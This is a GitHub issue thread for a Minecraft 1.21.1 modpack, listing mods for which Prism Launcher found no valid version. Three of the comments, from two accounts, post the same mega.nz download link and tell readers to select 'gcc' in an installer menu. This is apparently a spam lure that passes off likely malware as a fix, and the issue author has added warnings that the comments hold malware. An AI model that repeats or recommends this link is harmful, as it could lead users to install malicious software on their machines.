### ISSUE TITLE
[1.21.1] Missing Content List

### ISSUE THREAD

**Issue by NotAGanesh** [OptiNa-Team/OptiNa-Reborn#21]
> [!WARNING]  
> Critical malware files found in this comment section. do not download any files from there

---

List Cached using: Prism Launcher

--- 

Mod name: e4mc
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

Mod name: YetAnotherConfigLib
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

Mod name: Krypton
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

Mod name: Zoomify
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

Mod name: Replay Mod
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

Mod name: ObsidianUI
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

Mod name: Model Gap Fix
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

Mod name: Better Mount HUD
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

Mod name: Controlify
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

Mod name: Bobby
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

Mod name: Cubes Without Borders
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

Mod name: Paginated Advancements
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

Mod name: Fabrishot
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

Mod name: Debugify
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

Mod name: Animatica
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

Mod name: Enhanced Block Entities
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

Mod name: YOSBR
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

Mod name: Main Menu Credits
Reason: No valid version found for this mod. It's probably unavailable for the current game version / mod loader.

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by NotAGanesh** [comment]
> [!WARNING]  
> Critical content found on this comment section, do not open any links.

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
